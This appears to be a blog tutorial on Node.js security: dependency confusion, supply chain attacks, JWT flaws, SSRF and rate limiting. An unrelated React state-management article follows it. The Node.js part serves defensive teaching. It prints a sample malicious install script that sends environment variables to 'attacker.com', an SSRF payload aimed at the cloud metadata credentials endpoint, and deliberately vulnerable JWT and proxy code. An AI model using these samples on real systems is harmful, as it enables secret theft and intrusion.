Preventing Dependency Risks and Authentication Flaws in Node.js

Node.js revolutionized the web development paradigm with its event-driven, non-blocking architecture and is widely used for building scalable applications. But with its popularity comes more attention from malicious actors looking to take advantage of vulnerabilities. This article examines the growing security challenges surrounding dependency risks, authentication flaws, rate limiting, and more.

In Part 1 of our series, we explored some of the most common attack vectors against Node.js applications, from SQL injection and NoSQL injection to Cross-Site Scripting (XSS). But these are not the only security issues Node.js developers face today; they are only part of the picture.

In this second part of our series, we discuss lesser-known but no less dangerous threats that specifically target Node.js applications. From prototype pollution and insecure deserialization to authentication flaws and server-side request forgery – understanding these threats and their remediation strategies is crucial for secure application development in the current threat environment. Learn all about these Node.js security risks and how to prevent them.

Dependency Risks in the JavaScript Ecosystem

The JavaScript ecosystem is heavily dependent on third-party code. A typical Node.js project pulls in hundreds of packages, a huge attack surface that lives outside your own code – as recent supply chain attacks on popular npm packages have shown. Frameworks like Express.js, Fastify, and NestJS provide some protection, but not against every threat. Ultimately, it remains the developers' duty to build security checks and measures into every stage of the application development process.

Topic 1 – Node.js Security & Dependency Management Vulnerabilities

Outdated Packages and Security Implications

It’s normal for modern Node.js applications to depend on several dozen or even hundreds of dependencies. Each outdated package is a potential security hole that’s left unpatched in your application.

The npm ecosystem is quite dynamic, and vulnerabilities in widely used packages are regularly uncovered and patched. Dependencies that aren't updated leave your application exposed to known exploits even though a fix is available.

Example: Say a team is using the popular lodash package v4.17.15 in their application. This package version has a prototype pollution vulnerability that was fixed in version 4.17.19. This vulnerability lets attackers manipulate prototypes of JavaScript objects and, in certain circumstances, cause application crashes or even remote code execution.

This type of vulnerability is particularly dangerous because lodash is a dependency of over 150,000 other packages, which means it’s spread throughout the ecosystem. The longer teams delay updates, the longer their applications are vulnerable.
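To make this class of bug concrete, here is a minimal plain-JavaScript sketch of prototype pollution. It uses a naive hand-rolled merge instead of lodash itself, but the underlying mechanism is the same one the lodash patches addressed:

// A naive recursive merge with no key filtering – the pattern behind
// many real prototype pollution advisories
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (typeof source[key] === 'object' && source[key] !== null) {
      // Reading target['__proto__'] yields Object.prototype,
      // so the recursion merges attacker data into it
      target[key] = unsafeMerge(target[key] || {}, source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Attacker-controlled JSON smuggles in a __proto__ key
const payload = JSON.parse('{"__proto__": {"isAdmin": true}}');
unsafeMerge({}, payload);

// Every plain object in the process now inherits the polluted property
console.log({}.isAdmin); // true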

Mitigation Strategy: Audit your packages at regular intervals.

# Identify vulnerabilities in your dependencies
npm audit

# Fix vulnerable dependencies
npm audit fix

# For major version updates that npm audit fix can't automatically resolve
npm audit fix --force

Supply Chain Attacks

Supply chain attacks exploit the trust relationship between developers and package maintainers. Malicious actors compromise a trusted package or its distribution channel in order to inject code into the supply chain.

Example Scenario: The event-stream incident of 2018 demonstrated the risk perfectly. A malicious actor gained the trust of the package maintainer and was granted publishing rights to the package. They then injected cryptocurrency-stealing code that targeted Copay Bitcoin wallet users.

Attack Workflow:

  1. Attacker identifies a popular package with an inactive maintainer
  2. Attacker offers to help maintain the package
  3. Original maintainer grants publishing rights
  4. Attacker publishes a new version with malicious code
  5. Downstream applications automatically update to the compromised version

Mitigation Strategies: In package.json, use exact versions instead of ranges.

//In package.json, use exact versions instead of ranges
{
  "dependencies": {
    "express": "4.17.1",  // Good: exact version
    "lodash": "^4.17.20"  // Risky: accepts any 4.x version at or above 4.17.20
  }
}

//Use package-lock.json or npm shrinkwrap to lock all dependencies

//Illustrative check with a hypothetical npm-package-integrity helper
//(real-world equivalents include `npm audit signatures` or dedicated
//supply chain scanners):
const integrity = require('npm-package-integrity');

integrity.check('./package.json').then(results => {
  if (results.compromised.length > 0) {
    console.error('Compromised packages detected:', results.compromised);
    process.exit(1);
  }
});

Dependency Confusion Attacks

Dependency confusion attacks occur when a package manager resolves dependencies from both a public and a private registry. If an attacker publishes a package to the public registry under the same name as one of your private packages, but with a higher version number, the package manager may prefer the public version and install the attacker's package.

Example Attack Scenario: Your company uses a private package called @company/api-client at version 1.2.3. An attacker spots this package name in your public repository's package.json and publishes a malicious package with the same name but version 2.0.0 to the public npm registry. On the next install, npm finds the higher version in the public registry and pulls in the attacker's package.

Example Workflow:

  1. Once the malicious package is installed, the attacker can run arbitrary code via an install script.
// Malicious package preinstall script
// This runs automatically when the package is installed
const https = require('https');

// Stealing environment variables
const data = JSON.stringify({
  env: process.env,
  path: process.cwd()
});

// Sending data to attacker's server
const req = https.request({
  hostname: 'attacker.com',
  port: 443,
  path: '/collect',
  method: 'POST',
  headers: {'Content-Type': 'application/json'}
}, res => {});

req.write(data);
req.end();

Mitigation Strategies:

Use Scoped Packages: Scoped packages in npm help ensure that your packages are uniquely identified. For example, use @yourcompany/package-name instead of just package-name.

{
  "name": "my-project",
  "version": "1.0.0",
  "dependencies": {
    "@yourcompany/internal-package": "1.2.3"
  },
  "publishConfig": {
    "registry": "https://registry.yourcompany.com"
  }
}

In this example, the following measures are taken:

  • The package is scoped with @yourcompany to ensure uniqueness.
  • The publishConfig ensures that the package manager uses your private registry.
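A complementary safeguard (assuming https://registry.yourcompany.com is your private registry, as above) is an .npmrc file that maps the scope to that registry, so installs of @yourcompany packages never consult the public registry:

# .npmrc – checked into the project root
# All @yourcompany packages must come from the private registry
@yourcompany:registry=https://registry.yourcompany.com/

Combined with a committed package-lock.json and `npm ci` in CI, this removes the resolution ambiguity that dependency confusion relies on.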

Topic 2 – Authentication Flaws Threatening Node.js Security

JSON Web Token (JWT) Vulnerabilities – JWTs are among the most common means of authentication in Node.js apps, particularly for RESTful APIs. They are also frequently implemented incorrectly.

Common JWT Vulnerabilities:

  1. Weak Signing Algorithms: Accepting the none algorithm or using HMAC with short, guessable keys (see the sketch after this list).
  2. Insecure Token Storage: Saving tokens in localStorage instead of HttpOnly cookies.
  3. Missing Token Validation: Accepting tokens without verifying the signature, expiration, issuer, or audience.
  4. Hardcoded Secrets: Embedding signing secrets directly in the source code.
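As a minimal sketch of point 1, pin the accepted algorithms when verifying. This uses the jsonwebtoken package that the examples below also use; verifyToken is a hypothetical helper name:

const jwt = require('jsonwebtoken');

// Only accept tokens signed with the algorithm we actually issue.
// Pinning defeats algorithm-confusion tricks such as a token
// claiming "alg": "none".
function verifyToken(token, secret) {
  return jwt.verify(token, secret, { algorithms: ['HS256'] });
}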

Example of Vulnerable JWT Implementation:

const jwt = require('jsonwebtoken');

// Hardcoded secret in source code
const secret = 'mysecretkey';

app.post('/login', (req, res) => {
  // Create token with no expiration or audience validation
  const token = jwt.sign({ userId: user.id }, secret);
  res.json({ token });
});

app.get('/protected', (req, res) => {
  try {
    // No token validation or structure checks
    const token = req.headers.authorization.split(' ')[1];
    const decoded = jwt.verify(token, secret);

    // No additional checks on decoded token content
    res.json({ data: 'Protected resource' });
  } catch (error) {
    res.status(401).json({ error: 'Unauthorized' });
  }
});

The example code above has several issues:

Hardcoded Secret

  • Problem: The secret key is stored in the source code.
  • Risk: Anyone with access to the source code (or a leaked repository) also has the signing key.

No Token Expiration

  • Problem: The JWT is created without an expiration date.
  • Risk: Once issued, a compromised token can be used indefinitely.

Plain Text Token Transmission

  • Problem: The token is returned in the response body.
  • Risk: If tokens aren't sent over HTTPS, they can be easily intercepted.

No Token Validation or Structure Checks

  • Problem: The token is verified without checking its claims.
  • Risk: Tokens with unexpected claims (wrong issuer, audience, or role) can bypass authorization checks.

Improved code with Secure JWT Implementation:

const jwt = require('jsonwebtoken');
require('dotenv').config();

// Load JWT secret from environment variable
const secret = process.env.JWT_SECRET;
if (!secret || secret.length < 32) {
  throw new Error('JWT_SECRET environment variable must be set with at least 32 characters');
}

app.post('/login', async (req, res) => {
  // Create token with proper claims
  const token = jwt.sign(
    {
      userId: user.id,
      role: user.role
    },
    secret,
    {
      expiresIn: '1h',
      issuer: 'my-app',
      audience: 'my-api',
      notBefore: 0
    }
  );

  // Send token in HttpOnly cookie
  res.cookie('token', token, {
    httpOnly: true,
    secure: process.env.NODE_ENV === 'production',
    sameSite: 'strict',
    maxAge: 3600000 // 1 hour
  });

  res.json({ message: 'Authentication successful' });
});

app.get('/protected', (req, res) => {
  try {
    // Extract token from cookie (requires the cookie-parser middleware)
    const token = req.cookies.token;

    if (!token) {
      return res.status(401).json({ error: 'Authentication required' });
    }

    // Verify token with all necessary options
    const decoded = jwt.verify(token, secret, {
      issuer: 'my-app',
      audience: 'my-api'
    });

    // Additional validation
    if (decoded.role !== 'admin') {
      return res.status(403).json({ error: 'Insufficient permissions' });
    }

    res.json({ data: 'Protected resource' });
  } catch (error) {
    if (error.name === 'TokenExpiredError') {
      return res.status(401).json({ error: 'Token expired' });
    }
    res.status(401).json({ error: 'Invalid token' });
  }
});

The code snippet above demonstrates a strong focus on security through several measures:

  • Environment Variables: Sensitive data like the JWT secret is stored in environment variables instead of being hardcoded, reducing the risk of exposure.
  • Secure Cookies: The JWT is stored in an HttpOnly cookie with the secure and SameSite=strict flags, which prevents JavaScript from reading the token (mitigating theft via XSS) and blocks cross-site request forgery.
  • Role-Based Access Control: The implementation checks the user's role before allowing access to protected resources, so only authorized users can reach sensitive endpoints.

Topic 3 – Preventing SSRF Attacks in Node.js Security

Server-Side Request Forgery (SSRF) is a type of vulnerability where attackers trick a server into making requests to unintended targets. This is a particular concern in the Node.js environment, where HTTP requests are easy to make with libraries such as axios, request, got, node-fetch, and the native http/https modules.

SSRF attacks exploit server-side code that makes requests to other services, allowing attackers to:

  1. Access internal services behind firewalls that aren’t normally accessible from the internet.
  2. Scan internal networks and discover services on private networks.
  3. Interact with metadata services in cloud environments (e.g. AWS EC2 metadata service).
  4. Exploit trust relationships between the server and other internal services.

Common Attack Vectors

  1. URL Parameters in API Proxies: Many Node.js applications function as API gateways or proxies, forwarding requests to backend services.

Vulnerable Example:

const express = require('express');
const axios = require('axios');
const app = express();

app.get('/proxy', async (req, res) => {
  const url = req.query.url;
  try {
    // User can control the URL completely
    const response = await axios.get(url);
    res.json(response.data);
  } catch (error) {
    res.status(500).json({ error: error.message });
  }
});

In this example, an attacker could provide a URL pointing to an internal service, such as: GET /proxy?url=http://internal-admin-panel.local/users

Now let's look at a secure implementation:

const express = require('express');
const axios = require('axios');
const URL = require('url').URL;
const app = express();

// Define allowed domains
const ALLOWED_HOSTS = ['api.trusted.com', 'public-service.org'];

app.get('/proxy', async (req, res) => {
  const url = req.query.url;

  try {
    // Validate URL format
    const parsedUrl = new URL(url);
    if (!ALLOWED_HOSTS.includes(parsedUrl.hostname)) {
      return res.status(403).json({ error: 'Domain not allowed' });
    }

    // Proceed with request to allowed domain
    const response = await axios.get(url);
    res.json(response.data);
  } catch (error) {
    res.status(400).json({ error: 'Invalid URL or request failed' });
  }
});

In the example above, a few best practices were followed:

Domain Whitelisting:

  • Defines a list of allowed domains (ALLOWED_HOSTS).
  • Checks whether the hostname of the user-supplied URL is in this list before making the request.
  • Ensures that only requests to trusted domains are allowed, reducing the risk of SSRF attacks.
  • Prevents the application from making requests to unauthorized or potentially malicious domains.

  2. File Upload Services with Remote URL Support

Vulnerable Code:

app.post('/fetch-image', async (req, res) => {
  const imageUrl = req.body.imageUrl;

  try {
    // Downloads from any URL without validation
    const response = await axios.get(imageUrl, { responseType: 'arraybuffer' });
    const imageBuffer = Buffer.from(response.data);

    // Save to local storage
    fs.writeFileSync(`./uploads/${Date.now()}.jpg`, imageBuffer);
    res.json({ success: true });
  } catch (error) {
    res.status(500).json({ error: error.message });
  }
});

An attacker can supply a URL that forces the server to make requests to internal services or endpoints that should not be publicly reachable. This can expose sensitive information or details of internal networks.

Example Attack:

POST /fetch-image

Body: { "imageUrl": "http://169.254.169.254/latest/meta-data/iam/security-credentials/" }

Secure Implementation/Fix

  • Validate URL Format: Use the URL constructor to make sure the URL is well-formed, and allow only the http and https protocols to rule out harmful protocol handlers.
  • DNS Resolution and IP Blocking: Resolve the hostname to an IP address with dns.lookup and reject private and link-local ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 127.0.0.0/8, 169.254.0.0/16) so the server cannot be steered toward internal network resources.
  • Preventing Redirects: Set the maxRedirects option of the axios request to 0 to avoid redirect-based bypasses that could reach prohibited URLs.

The following implementation applies all three measures:
const dns = require('dns').promises;

app.post('/fetch-image', async (req, res) => {
  const imageUrl = req.body.imageUrl;

  try {
    // 1. Validate URL format
    const parsedUrl = new URL(imageUrl);

    // 2. Only allow http/https protocols
    if (!['http:', 'https:'].includes(parsedUrl.protocol)) {
      return res.status(403).json({ error: 'Protocol not allowed' });
    }

    // 3. Resolve hostname to IP
    const { address } = await dns.lookup(parsedUrl.hostname);

    // 4. Block private IP ranges
    if (/^(10\.|172\.(1[6-9]|2[0-9]|3[0-1])\.|192\.168\.|127\.|169\.254\.)/.test(address)) {
      return res.status(403).json({ error: 'Cannot access internal resources' });
    }

    // 5. Now safe to proceed
    const response = await axios.get(imageUrl, {
      responseType: 'arraybuffer',
      maxRedirects: 0 // Prevent redirect-based bypasses
    });

    const imageBuffer = Buffer.from(response.data);
    fs.writeFileSync(`./uploads/${Date.now()}.jpg`, imageBuffer);
    res.json({ success: true });
  } catch (error) {
    res.status(400).json({ error: 'Invalid URL or request failed' });
  }
});

Topic 4 – Rate Limiting and DoS Protection

Attackers are known to launch traffic-based attacks on Node.js applications to knock systems offline or exhaust their resources:

  1. Distributed Denial of Service (DDoS): Your server is flooded with requests from many sources until legitimate users can no longer access the service.
  2. Brute Force Attempts: Attackers use automated tools to try combinations of credentials against your login in an attempt to guess valid ones.
  3. Scraping and Harvesting: Bots make large numbers of requests to harvest content from your application, degrading performance and leaking data.
  4. API Abuse: Excessive API requests that consume resources or exploit the free usage tiers of your application's APIs.

Note: At the infrastructure level, solutions including AWS WAF, Cloudflare, or Nginx can provide better protection without imposing too much load on your application code. These services provide more sophisticated features like distributed rate limiting, traffic monitoring, and auto-scaling during attacks. But this article focuses only on application-level security policies.

Traffic Management Best Practices

Proper traffic management begins with rate limiting both in the application and infrastructure. This can be done in Node.js using the express-rate-limit middleware package.

const rateLimit = require('express-rate-limit');

const apiLimiter = rateLimit({
  windowMs: 15 * 60 * 1000, // 15 minutes
  max: 100, // limit each IP to 100 requests per windowMs
  message: 'Too many requests, please try again later.'
});

app.use('/api/', apiLimiter); // Apply to all API endpoints

To gain finer control, set different rate limits for different endpoints depending on their sensitivity and resource requirements.

For instance, authentication endpoints usually warrant much stricter limits than general content endpoints. Moreover, implement progressive delays for failed attempts and account lockout policies for persistent failures. The rate-limiter-flexible library (developed as node-rate-limiter-flexible on GitHub) adds features like Redis-based distributed rate limiting for apps deployed across multiple servers.
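A minimal sketch of such a per-endpoint limit with express-rate-limit (the /login route and loginHandler are hypothetical):

const rateLimit = require('express-rate-limit');

// Much stricter than the general API limiter above
const loginLimiter = rateLimit({
  windowMs: 15 * 60 * 1000, // 15 minutes
  max: 5, // only 5 attempts per IP per window
  message: 'Too many login attempts, please try again later.'
});

app.post('/login', loginLimiter, loginHandler);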

Mitigating DoS Vulnerabilities

Set request size limits to prevent payload attacks:

app.use(express.json({ limit: '10kb' }));

app.use(express.urlencoded({ extended: true, limit: '10kb' }));

Use helmet for additional HTTP security headers:

const helmet = require('helmet');

app.use(helmet());

Infrastructure-Level Protection

It's best to approach security at the infrastructure level first and treat application-level measures as a secondary layer. Options include:

  • Reverse Proxies: Nginx or HAProxy can act as a barrier, perform rate limiting, and sit as a middle layer between your clients and the application.
  • CDNs: Cloudflare or Fastly offer integrated DDoS protection and rate limiting.
  • Cloud Provider Solutions: AWS WAF, Azure Front Door, or Google Cloud Armor can monitor and filter traffic.
  • Load Balancers: These distribute traffic across multiple instances, absorbing load spikes and filtering suspicious requests.

Conclusion: Strengthening Node.js Security Layers

Node.js security is an evolving challenge; keeping up with remediation strategies is essential to protect your applications from modern attack vectors. As discussed in this article, attackers are always looking for ways to exploit traffic vulnerabilities, so a layered approach is necessary. Key points to keep in mind include:

  • Defense in depth is essential: Combine application-level protections such as middleware and request limits with infrastructure-level defenses like reverse proxies, CDNs, and WAFs to create several layers of protection against traffic-based attacks on Node.js apps.
  • Understand attack patterns: Effective defenses require familiarity with strategies like DDoS attacks, brute force attempts, API abuse, and resource exhaustion.
  • Balance security with usability: Set rate limits that block malicious traffic without degrading service quality for legitimate users. Endpoints need different thresholds depending on their risk and frequency of use.
  • Implement graduated responses: Escalate step by step, beginning with slight delays, then temporary blocks, and finally permanent IP bans for severe attackers, according to the frequency and severity of suspicious activity.
  • Continuously monitor and adjust: Security is not set-and-forget. Analyze traffic patterns regularly, review and adjust rate limits, and update protection mechanisms to address new threats and application requirements.
  • Leverage existing tools: Use proven tools and services such as express-rate-limit, Cloudflare, or AWS WAF instead of developing your own and risking critical mistakes along the way.
  • Consider distributed applications: For applications deployed across several servers, implement distributed rate limiting with Redis or a similar technology so that the whole infrastructure is uniformly protected.
  • Test your defenses: Regularly conduct penetration testing to verify the effectiveness of your rate limiting and DoS protection measures under realistic attack scenarios.

 

🔍 Frequently Asked Questions (FAQ)

1. What are the main dependency risks in Node.js applications?

Node.js applications often depend on hundreds of third-party packages, increasing their exposure to vulnerabilities. Outdated packages, supply chain compromises, and dependency confusion are among the most critical risks developers must mitigate.

2. How can outdated Node.js packages introduce security vulnerabilities?

Outdated packages may contain known vulnerabilities that attackers can exploit. For example, lodash v4.17.15 has a prototype pollution issue that was fixed in v4.17.19, affecting thousands of dependent packages.

3. What is a supply chain attack in the Node.js ecosystem?

A supply chain attack occurs when malicious code is injected into a trusted dependency, often through social engineering or takeover of an inactive package. This code propagates downstream, compromising applications that rely on the affected package.

4. How can developers prevent dependency confusion in npm?

To prevent dependency confusion, developers should use scoped packages (e.g., @company/package) and configure the publishConfig.registry field to enforce use of internal registries.

5. What are common JWT vulnerabilities in Node.js?

Frequent JWT vulnerabilities include hardcoded secrets, weak signing algorithms, lack of token validation, and insecure token storage. These flaws can lead to unauthorized access and token abuse.

6. How should JWTs be securely implemented in Node.js?

Secure JWT implementations use environment variables for secrets, set expiration and validation claims, and transmit tokens via HttpOnly cookies with strict flags to mitigate XSS and CSRF attacks.

7. What is Server-Side Request Forgery (SSRF) and how can it be exploited in Node.js?

SSRF exploits occur when an attacker manipulates the server into making unauthorized requests, potentially exposing internal services or metadata endpoints. This is often done via user-controlled URLs in APIs or file uploads.

8. How can developers mitigate SSRF in Node.js applications?

Mitigation techniques include domain whitelisting, validating URL protocols, resolving DNS to block private IPs, and disabling redirects in HTTP clients like Axios.

9. What are best practices for rate limiting in Node.js?

Use libraries like express-rate-limit to set per-IP request caps, apply stricter controls on authentication routes, and consider distributed rate limiting via Redis for multi-instance applications.

10. How can infrastructure-level protection enhance Node.js app security?

Infrastructural tools like AWS WAF, Cloudflare, and Nginx offer advanced rate limiting, request filtering, and DDoS protection beyond what app-level middleware can provide.

What's the Best Way to Manage State in React?

No topic is as controversial in the React world as state management. Unlike many other topics, there aren't just two camps. Solutions range from categorically rejecting central state management, to implementing it with React's built-in tools or lightweight libraries, right through to heavyweight solutions that determine the entire application's architecture. Let's examine several state management approaches and use cases, focusing on lightweight solutions with low overhead and limited impact on the overall application.

Let’s start at the very beginning: Why is central state management necessary? This question is not exclusive to React; it arises from modern single-page frameworks’ component-based approaches. In these frameworks, components form the central building blocks of applications. Components can have their own state, which contains either the data to be presented in the browser or the status of UI elements. A frontend application usually contains a large number of small, loosely coupled, and reusable components that form a tree structure. The closer the components are to the root of the tree, the more they are integrated into the application’s structure and business logic.

The leaf components of the tree are usually UI components that take care of the display. The components need data to display. This data usually comes from a backend interface and is loaded by the frontend components. In theory, each component could retrieve its own data, but this results in a large number of requests to the backend. Instead, requests are usually bundled at a central point. The component forming the lowest common denominator, i.e., the parent component of all components that need information from this backend interface, is typically the appropriate location for server communication and data management.

And this is precisely the problem leading to central state management. Data from the backend has to be transferred to the components handling the display. This data flow is handled by props, the dynamic attributes of the components. This channel also takes care of write communication: creating, modifying, and deleting data. This isn’t an issue if there are only a few steps between the data source and display, but the longer the path, the greater the coupling of the component tree. Some of the components between the source and the target have nothing to do with the data and simply pass it on. However, this significantly limits reusability. The concept of central state management solves this by eliminating the communication channel using props and giving child components direct access to the information. React’s Context API makes this shortcut possible.

Central state management has many use cases. It’s often used in applications that deal with data record management. This includes applications that manage articles and addresses, fleet management, smart home controls, and learning management applications. The one thing all use cases have in common is that the topic runs through the entire application and different components need to access the data. Central state management minimizes the number of requests, acts as a single source of truth, and handles data synchronization.

Can You Manage Central State in React Without Extra Libraries?

For a long time, the Redux library was the central state management solution, and it’s still popular today. With around 8 million weekly package downloads, the React bindings for Redux are ahead of popular libraries like TanStack Query with 5 million downloads or React Hook Form with 6.5 million downloads. Overall, Redux downloads have been stagnating for some time. This is partly due to Redux’s somewhat undeserved bad reputation. The library has long been accused of causing unnecessary overhead, which prompted Dan Abramov, one of its developers, to write his famous article entitled “You might not need Redux.” Essentially, he says that Redux does involve a certain amount of overhead, but it quickly pays off in large applications. Extensions like the Redux Toolkit also further reduce the extra effort.

The lightest Redux alternative consists of a custom implementation based on React’s Context API and State Hook. The key advantage is that you don’t need any additional libraries. For example, let’s imagine a shopping cart in a web shop. The cart is one of the shop’s central elements and you need to be able to access it from several different places. In the shop, you should be able to add products to the cart using a list. The list shows the number of items currently in the shopping cart. An overview component shows how many products are in the cart and the total value. Both components – the list and the overview – should be independent of each other but always show the latest information.

Without React's Context API, the only solution is to store shopping cart data in the state of a component that's a parent to both components. Then, this passes its state to the components using props. This creates a very tight coupling between these components. A better solution is based on the Context API. For this, you need the context, which you create with the createContext function. The provider component of the context binds it to the component tree, supplies it with a concrete value, and allows child components to access it. Since React 19, the context object can also be used directly as a provider. This eliminates needing to take a detour with the context's provider component. With useContext (or, since React 19, the use function), you can access the context. Listing 1 shows the implementation of CartContext.

Listing 1: Implementing CartContext

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  SetStateAction,
  use,
  useState,
} from 'react';
import { Cart } from './types/Cart';

type CartContextType = [Cart, Dispatch<SetStateAction<Cart>>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};
export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const cart = useState<Cart>({ items: [] });

  return <CartContext value={cart}>{children}</CartContext>;
};

export function useCart() {
  const context = use(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

The idea behind React’s Context API is that you can store any structure and access it from all child components. The structure can be a simple value like a number or a string, but objects, arrays, and functions are also allowed. In our example, the cart’s state structure is in the context. As usual in React, this is a tuple consisting of the state object, which you can use to read the state, and a function that can change the state. The CartContext can either contain the state structure or the value null. When you call the createContext function, you pass null as the default value. This lets you check if the context provider has been correctly integrated.

The CartProvider component defines the cart state and passes it as a value to the context. It accepts children in the form of a ReactNode object. This lets you integrate the CartProvider component into your component tree and gives all child components access to the context.

The last implementation component is a hook function called useCart. This controls access to the context. The use function provides the context value. If the value is null, it indicates that useCart was called outside of a CartProvider. In this case, the function throws an exception instead of returning the state value.

What does the application code look like when you want to access the state? We’ll use the ListItem component as an example. It accesses the context in both read and write mode. Listing 2 shows the simplified source code for the component.

Listing 2: Accessing the context

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCart } from './CartContext';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);

  const [cart, setCart] = useCart();

  function addToCart() {
    const quantity = Number(inputRef.current?.value);
    if (quantity) {
      setCart((prev) => ({
        items: [
          ...prev.items.filter((item) => item.id !== product.id),
          {
            ...product,
            quantity,
          },
        ],
      }));
    }
  }

  return (
    <li>
      {product.name}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cart.items.find((item) => item.id === product.id)?.quantity
        }
      />
      <button onClick={addToCart}>add</button>
    </li>
  );
};

export default ListItem;

The ListItem component represents each entry in the product list and displays the product name and an input field where you can specify the number of products you want to add to the shopping cart. When you click the button, the component’s addToCart function updates the cart context. This is possible by using the useCart function to access the state of the shopping cart and entering the current product quantity in the input field. Use the setCart function to update the context.

One disadvantage of this implementation is that the ListItem component has to know the CartContext in detail and performs the state update itself in the callback passed to setCart. You can solve this by extracting this block into a shared function, which the ListItem component and every other component in the application can then use.

How Do You Synchronize React State with Server Communication?

This solution only works locally in the browser. If you close the window or if a problem occurs, the current shopping cart disappears. You can solve this by applying the actions locally to the state and saving the operations on the server. But this makes implementation a little more complex. When loading the component structure, you must load the currently valid shopping cart from the server and save it to the state. Then, apply each change both on the server side and in the local state. Although this results in some overhead, the advantage is that the current state can be restored at any time, regardless of the browser instance. If you implement the addToCart functionality as a separate hook function, the components remain unaffected by this adjustment.

Listing 3: Implementing the addToCart Functionality

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  SetStateAction,
  use,
  useEffect,
  useRef,
  useState,
} from 'react';
import { Cart } from './types/Cart';
import { Product } from './types/Product';

type CartContextType = [Cart, Dispatch<SetStateAction<Cart>>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};
export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const cart = useState<Cart>({ items: [] });

  useEffect(() => {
    fetch('http://localhost:3001/cart')
      .then((response) => response.json())
      .then((data) => cart[1](data)); // cart[1] is the tuple's setter function
  }, []);

  return <CartContext value={cart}>{children}</CartContext>;
};

export function useCart() {
  const context = use(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

export function useAddToCart(
  product: Product
): [React.RefObject<HTMLInputElement | null>, () => void] {
  const [cart, setCart] = useCart();
  const inputRef = useRef<HTMLInputElement>(null);

  function addToCart() {
    const quantity = Number(inputRef.current?.value);

    if (quantity) {
      const updatedItems = [
        ...cart.items.filter((item) => item.id !== product.id),
        { ...product, quantity },
      ];

      fetch('http://localhost:3001/cart', {
        method: 'PUT',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ id: 1, items: updatedItems }),
      })
        .then((response) => response.json())
        .then((data) => setCart(data));
    }
  }

  return [inputRef, addToCart] as const;
}

The CartProvider component loads the current shopping cart from the server. How users access the shopping cart depends upon the specific interface implementation. The code in the example assumes that the server makes the shopping cart available for the current user via /cart. One potential solution is to differentiate between users using cookies. The second adjustment consists of the useAddToCart function. It receives a product and generates the addToCart function and the ref for the input field. In the addToCart function, the shopping cart is updated locally, sent to the server, and then the local state is set by calling the setCart function. During implementation, we assume the shopping cart is updated via a PUT request to /cart and that this interface returns the updated shopping cart.

Implementation using a combination of context and state is suitable for manageable use cases. It’s lightweight and flexible, but large applications run the risk of the central state becoming chaotic. One possible fix is no longer exposing the function for modifying the state externally, but using the useReducer hook instead.

How Can You Manage React State Using Actions?

React offers another hook for component state management: the useReducer hook. Unlike the more commonly used useState hook, it does not provide a function for setting the state directly. Instead, it returns a tuple of the readable state and a dispatch function. When you call the useReducer function, you pass a reducer function whose task is to generate a new state from the previous state and an action object.

The action object describes the change, like adding products to the shopping cart. Actions are usually simple JavaScript objects with the properties type and payload. The type property specifies the type of action, and the payload provides additional information.

The reducer hook is intended for local state management, but you can easily integrate asynchronous server communication. However, it’s recommended that you separate synchronous local operations from asynchronous server-based operations. The reducer should be a pure function and free of side effects. This means that the same inputs always result in the same outputs and the current state is only changed based on the action provided. If you stick to this rule, your code will be clearer and better structured, and error handling is easier. You’ll also be more flexible when it comes to future software extensions. Listing 4 shows an implementation of state management with the useReducer hook.

Listing 4: Using the useReducer-Hooks

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  useContext,
  useEffect,
  useReducer,
} from 'react';
import { Cart, CartItem } from './types/Cart';

const SET_CART = 'setCart';
const ADD_TO_CART = 'addToCartAsync';
const FETCH_CART = 'fetchCart';

type FetchCartAction = {
  type: typeof FETCH_CART;
};

type SetCartAction = {
  type: typeof SET_CART;
  payload: Cart;
};

type AddToCartAsyncAction = {
  type: typeof ADD_TO_CART;
  payload: CartItem;
};

type CartAction = FetchCartAction | SetCartAction | AddToCartAsyncAction;

type CartContextType = [Cart, Dispatch<CartAction>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};

function cartReducer(state: Cart, action: CartAction): Cart {
  switch (action.type) {
    case SET_CART:
      return action.payload;

    default:
      throw new Error(`Unhandled action type: ${action.type}`);
  }
}

function cartMiddleware(dispatch: Dispatch<CartAction>, cart: Cart) {
  return async function (action: CartAction) {
    switch (action.type) {
      case FETCH_CART: {
        const response = await fetch('http://localhost:3001/cart');
        const data = await response.json();
        dispatch({ type: SET_CART, payload: data });
        break;
      }
      case ADD_TO_CART: {
        const response = await fetch('http://localhost:3001/cart', {
          method: 'PUT',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({
            items: [...cart.items, action.payload],
          }),
        });

        const updatedCart = await response.json();
        dispatch({ type: SET_CART, payload: updatedCart });
        break;
      }
      default:
        dispatch(action);
    }
  };
}

export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const [cart, dispatch] = useReducer(cartReducer, { items: [] });
  const enhancedDispatch = cartMiddleware(dispatch, cart);

  useEffect(() => {
    enhancedDispatch({ type: FETCH_CART });
  }, []);

  return (
    <CartContext.Provider value={[cart, enhancedDispatch]}>
      {children}
    </CartContext.Provider>
  );
};

export function useCart() {
  const context = useContext(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

export function useAddToCart() {
  const [, dispatch] = useCart();

  const addToCart = (item: CartItem) => {
    dispatch({ type: ADD_TO_CART, payload: item });
  };

  return addToCart;
}

